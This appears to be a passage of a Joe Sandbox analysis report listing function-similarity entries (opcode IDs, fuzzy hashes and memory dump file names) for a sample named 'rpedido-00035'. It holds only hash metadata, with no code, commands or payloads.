                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e625407967952f0a2e580c0adea7837078bd020e2c835f67f0ecc4f98d2c1dd5
                                                          • Instruction ID: 251baedffe59db748ef42a87329038c878a6d34d13e17cf03226d0b3b8aaba01
                                                          • Opcode Fuzzy Hash: e625407967952f0a2e580c0adea7837078bd020e2c835f67f0ecc4f98d2c1dd5
                                                          • Instruction Fuzzy Hash: 0571ECB4C043259FEB218F59C8927AEBFF1FF49714F1041AAE841AB340D731A855CBA4
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4038db2e352b7b3e3a36ce478a2a5d7ffc96a465d48478546689fb1c9ab10998
                                                          • Instruction ID: c9646d6208a5c57efa51db827c84ca0fa59beb2610f2132a77b71f873059123b
                                                          • Opcode Fuzzy Hash: 4038db2e352b7b3e3a36ce478a2a5d7ffc96a465d48478546689fb1c9ab10998
                                                          • Instruction Fuzzy Hash: A7712435A042558FE301CF68C885B2ABBE5FF84304F04C5EAE859CB356DB34D985CBA6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 86e94bafc3b5b863626c215a888de59463ccce7ec766393a9ca915bb110df9dc
                                                          • Instruction ID: 0e9545212689dcb427146f70f4ff6b388bf0cf7a845ac2592170fe66d9491d2e
                                                          • Opcode Fuzzy Hash: 86e94bafc3b5b863626c215a888de59463ccce7ec766393a9ca915bb110df9dc
                                                          • Instruction Fuzzy Hash: D8518878A18311CFE714CF29C59591ABFF5FB88744F2049AEE69897350DB30E848CB92
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3e16570a2532b3ff6c58778cebd439c5edf5ede5da9451bc3e97b306a6f95e93
                                                          • Instruction ID: 5012173c0b1657fb0692883d942a9e7dff314c3ab4f8a923f03c80ccc6de671e
                                                          • Opcode Fuzzy Hash: 3e16570a2532b3ff6c58778cebd439c5edf5ede5da9451bc3e97b306a6f95e93
                                                          • Instruction Fuzzy Hash: 345103B15043109FE720EF65CE86F5E7FE8EB44364F1006ADEA1197291DB30E815CBA2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 94e0a5dc9d4dcc3004c3ae68adb839228ba753f076242711e2650b383c6ff389
                                                          • Instruction ID: 8be1dbfd9d07f91049797a02efae66fa77bce117d02047b688ff9b21c58ad0d4
                                                          • Opcode Fuzzy Hash: 94e0a5dc9d4dcc3004c3ae68adb839228ba753f076242711e2650b383c6ff389
                                                          • Instruction Fuzzy Hash: 91412871A007009FE7269F2ACD42B1A7FF5FF48758F2184AAE5499B250DB31D841CF80
Memory Dump Source
• Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
• Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                          • Opcode Fuzzy Hash: be043d55bea047d94e1e5ede4e0982c3e8df5f1dee616b452d43f82ef29d2e08
                                                          • Instruction Fuzzy Hash: 7F51C479A047A0CFE315CB29D942B5A7BE5EF44B94F4505E4F8118B6E0DB34DC40CBA6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 378b6ea2690461ba2e231297a609f0620a72d96a2581e8c9db1b1bf84233c730
                                                          • Instruction ID: 3fc7effc5e2ebeb7065094aff4b30afdab5cb36a9f384a2b01f9ac6767fa42e4
                                                          • Opcode Fuzzy Hash: 378b6ea2690461ba2e231297a609f0620a72d96a2581e8c9db1b1bf84233c730
                                                          • Instruction Fuzzy Hash: BD514879E00615CFDB04CF9AC481AAEBBF1FF84714F2481A9D815AB750D775AE81CB90
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 67d102b2730e69a143653ea03903a15a4833c1f49b5b5be7f2cb600bbb1408b9
                                                          • Instruction ID: 05515af0cc50864795bfb11bafa45bf7d4c0ea80937e964568e1cf713f783f03
                                                          • Opcode Fuzzy Hash: 67d102b2730e69a143653ea03903a15a4833c1f49b5b5be7f2cb600bbb1408b9
                                                          • Instruction Fuzzy Hash: 9451D5B8D102169FEB15CB24CD12BADBFF1AF01314F1482EAD115A72D1DB7499A1CF85
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a0bbd517b770ceb8d7361fc2b972ebfa65e281cddcab99ad6af9bed119cbb6d4
                                                          • Instruction ID: b9a7a039a3604cd92a16e079791150d7b6e6d71dae402f41461debe9380e26b1
                                                          • Opcode Fuzzy Hash: a0bbd517b770ceb8d7361fc2b972ebfa65e281cddcab99ad6af9bed119cbb6d4
                                                          • Instruction Fuzzy Hash: 72419AB4A40311AFE7229F66CD42B5ABFF8EF00788F5084E9E6419B290DB71D940CF91
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ca11b9fa619a4bdd9e979318721559f71863bf103a0d8c03f253a0b9d989a1be
                                                          • Instruction ID: db27206f6cf01fa7a0930e134044f80bc2cf4835a6ba3dd422473d119d8a68b4
                                                          • Opcode Fuzzy Hash: ca11b9fa619a4bdd9e979318721559f71863bf103a0d8c03f253a0b9d989a1be
                                                          • Instruction Fuzzy Hash: 8141AF78A147019FE324CF6ACA81A16BBF5FF48318B5089AED49787A50EF70E455CBD0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5aa1043b94caaf10c7a1f418eb508a53ec7b4c6cf9968afb119519fbddd995b9
                                                          • Instruction ID: c3022e2de313bc019369111d00e6f469c02f6ff7d6799b9ab770464be84d2d6c
                                                          • Opcode Fuzzy Hash: 5aa1043b94caaf10c7a1f418eb508a53ec7b4c6cf9968afb119519fbddd995b9
                                                          • Instruction Fuzzy Hash: 5F41C972946314CFEB01CF68C98679E7BB5BF88365F2001DAE510BB290DF749855CBA4
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4d3fea0aa3304c0c7f45af290a24458c0a9f19fd2980c7aa3a846ab6fe2040c6
                                                          • Instruction ID: 373329772cc8e48fc2c1c09d7e38c7bb42f7d562257a67c04201daad5b703833
                                                          • Opcode Fuzzy Hash: 4d3fea0aa3304c0c7f45af290a24458c0a9f19fd2980c7aa3a846ab6fe2040c6
                                                          • Instruction Fuzzy Hash: 2C41D2B1105200DFD720EF25CE82E5A7FE5EF44360F1146AEEA6557291CB30E825DBE6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: db222aff31ac99bbcf2dda992de91452d5bad2b8758ffabb997b8c49cee3dcdf
                                                          • Instruction ID: 2fd043f8ae95ffd4a30d8a49a5195bcd2f8c5dd348b437dfed68b4a826f34b4f
                                                          • Opcode Fuzzy Hash: db222aff31ac99bbcf2dda992de91452d5bad2b8758ffabb997b8c49cee3dcdf
                                                          • Instruction Fuzzy Hash: D34166B5A00705EFEB25DF99CA81A9ABBF4EF48310B1049BDE157E7250D730AA84CF50
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 46616c9b5fbcc1e0aa32103be60e9f67f9e3596990d85749ebe483d24930c875
                                                          • Instruction ID: 36866295e2b173e67da56bfce99dfeb14df2ba489f6f8d094735d94d5eaab4dc
                                                          • Opcode Fuzzy Hash: 46616c9b5fbcc1e0aa32103be60e9f67f9e3596990d85749ebe483d24930c875
                                                          • Instruction Fuzzy Hash: 85414AB4D00248DFDB25DFA9C981AAEBFF5BB49300F5081AEE659A7201D7309915CF60
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 74dece68affaf836bf4bd6e53af8171ee0412c54fed6f6354a92811394961a66
                                                          • Instruction ID: a2b9ad8987fd597894eea28a675a6af358692ac65dce98f6b9d5697641148065
                                                          • Opcode Fuzzy Hash: 74dece68affaf836bf4bd6e53af8171ee0412c54fed6f6354a92811394961a66
                                                          • Instruction Fuzzy Hash: 1F41D2B1A04301CFD316CF29C982B2BBBE6EBC4754F1446ADE8A5873C1DAB4D845C791
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4cefe7bbe873abf2552f6d26a23f2d1ed63b1ee6395be3350c0cadaadc6b6a89
                                                          • Instruction ID: b146e8fbbb436b8156aeeb2de678963cde191b70acdcbe385d9f5f2cdd2d9092
                                                          • Opcode Fuzzy Hash: 4cefe7bbe873abf2552f6d26a23f2d1ed63b1ee6395be3350c0cadaadc6b6a89
                                                          • Instruction Fuzzy Hash: A74134B5A00216DFDB15CF5AC981BA9BFF1FF48314F1481AAE948AB344CB749942CB90
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ac460b79e38c1038cd374165553de06304622773a5c61a521fd480df25d4cc20
                                                          • Instruction ID: db0698d7d61d49383e2e48ee61e058bda598a1a225b83af5aa19441290dbc51d
                                                          • Opcode Fuzzy Hash: ac460b79e38c1038cd374165553de06304622773a5c61a521fd480df25d4cc20
                                                          • Instruction Fuzzy Hash: 0A41C3766047419FC310CF69C941BAABBEABF88740F00465DF959C7690E730D904D7A6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3b5ea768f5c6f27d87bba895ac2d90d9c232eb6d903ecbccf215107f60aedf4c
                                                          • Instruction ID: 3e545d98d192c0f89dcbb4b0e6cf9d9137cc48405b1f23bbe56da8872f2e3fd4
                                                          • Opcode Fuzzy Hash: 3b5ea768f5c6f27d87bba895ac2d90d9c232eb6d903ecbccf215107f60aedf4c
                                                          • Instruction Fuzzy Hash: 1341DBB6500A45DFD732CF15CA82EAA7FA5FF44B10F5045B8E8098B6A0CB31E841DB94
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e9a1b4e739a61d39d5391a5ebe807c26577b61d7282414683b6545c56c7ed405
                                                          • Instruction ID: bbb5d962aa9241853c6ffb59ce3a4765017e9a01aef6d29d74e94f6893df980a
                                                          • Opcode Fuzzy Hash: e9a1b4e739a61d39d5391a5ebe807c26577b61d7282414683b6545c56c7ed405
                                                          • Instruction Fuzzy Hash: E0315A31609341DFE313DE99C412B1ABFE4AF95389F6084A9F8C48B2A0C736C881C7D2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3f67125b65db2f87240d259d300642a9c70b5549afbf7b1259f241c083598fb2
                                                          • Instruction ID: 7c7c05929ed79dcd20efbc09cd4830bcb41639a5ade8d0d9d43865e55c0a8f8f
                                                          • Opcode Fuzzy Hash: 3f67125b65db2f87240d259d300642a9c70b5549afbf7b1259f241c083598fb2
                                                          • Instruction Fuzzy Hash: 8631E8B5B41690DBF316C76ACE46B197FD8BF01F84F6504F0AA089B6D2DB68D840C213
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 09c1d271235e9de017ca27c8377251f435e7228edd09e66ba848e91f97998795
                                                          • Instruction ID: 4acdb3c4dce2b63ed79e78426add2a446f20275c06b884df19ec225844332a3c
                                                          • Opcode Fuzzy Hash: 09c1d271235e9de017ca27c8377251f435e7228edd09e66ba848e91f97998795
                                                          • Instruction Fuzzy Hash: 8731043AE047119BE711DF16CA8295B7FE5EF842A4F1144AAFC8697210EE30DC01CFA2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9a5c07cd4a8a3dfe952b134628720f57874caf2c1c4f291226fb3b8e46811816
                                                          • Instruction ID: da7248b389061cb90f576d1267a9f0f37ec9a2805af2e4499a81e4a44163de48
                                                          • Opcode Fuzzy Hash: 9a5c07cd4a8a3dfe952b134628720f57874caf2c1c4f291226fb3b8e46811816
                                                          • Instruction Fuzzy Hash: C8319CB5A057118FE310CF19C942B1ABBE9FF88700F5549EDE88897790EB74E944CB92
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e305e0d7f41ac056458eddf92bc4299b25b47a72481478b7a5e1aaa482e8e8be
                                                          • Instruction ID: 4c952752c9a02ed6510dbf3496774d57433e1c138de220ddbc117085ac2d7317
                                                          • Opcode Fuzzy Hash: e305e0d7f41ac056458eddf92bc4299b25b47a72481478b7a5e1aaa482e8e8be
                                                          • Instruction Fuzzy Hash: 1B31C57AA00204AFF711CE59DD82B5E7BE9DF44798F1184A9E9189B280D674DD40CFB0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 241b8a829ca63ffa8a9ef5e05c64435535f197a1a802660e6b21c643b4a54232
                                                          • Instruction ID: 4da664b6aab02bae24eb8347e5137db9d9a08ac3c59c759dd048a909076b230c
                                                          • Opcode Fuzzy Hash: 241b8a829ca63ffa8a9ef5e05c64435535f197a1a802660e6b21c643b4a54232
                                                          • Instruction Fuzzy Hash: F7316EB6B00700AFE721DF6ADD46B57BBE8AB08794F50047DA599D3640EA70E800CF54
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
                                                          • Instruction ID: 51b48c62df27738de474311e1b6dca46a13d6687841c51c358df63674e786535
                                                          • Opcode Fuzzy Hash: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
                                                          • Instruction Fuzzy Hash: EC31C1B2E00625EFC704CF69C981AADBBF1FF58315F1581AAD858DB341D734AA51CBA0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fd3a9a50335d25d05847652c45cdff33a8c078eecf78fd492c657d8d6b3a0af1
                                                          • Instruction ID: ca27c78ac8cf60812e297c839521d8ad7f685deae9313753f20cd2ab8a0e0f8f
                                                          • Opcode Fuzzy Hash: fd3a9a50335d25d05847652c45cdff33a8c078eecf78fd492c657d8d6b3a0af1
                                                          • Instruction Fuzzy Hash: B131C071B013059FE710DFAAC982B6EBBFAEF44309F2044A9E545DB250D730D945CBA1
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ed1908c2f29777cbb63b322c72ea719a730d2046f53b0c578df7c0e9158d2612
                                                          • Instruction ID: abc9993441ccbb79271d0c2bd4a945cbd719cc4977ac2a3f89c6ea75524aab40
                                                          • Opcode Fuzzy Hash: ed1908c2f29777cbb63b322c72ea719a730d2046f53b0c578df7c0e9158d2612
                                                          • Instruction Fuzzy Hash: 7D31C035A4062CAFFB25CB24CD82FDE7BB9AB05740F4100E5E644B7290D6B49E81CFA1
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1386c6d095d6e58571b4c93d2d3da401866e7bba18fc4caed52e7e99e830cfc3
                                                          • Instruction ID: d6769f9ca5b860457bb3652bf2e129f40e3abdb1be5c2e0b6a5434bed28db3b2
                                                          • Opcode Fuzzy Hash: 1386c6d095d6e58571b4c93d2d3da401866e7bba18fc4caed52e7e99e830cfc3
                                                          • Instruction Fuzzy Hash: DA3135B59003108BE7109F26CD42B697FB4EF4131CF8481E9D955AB281DE74ED86CB91
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2f788e452fe73d534c92f5e9bceb907d933a23c1ad1363216731123cd800826a
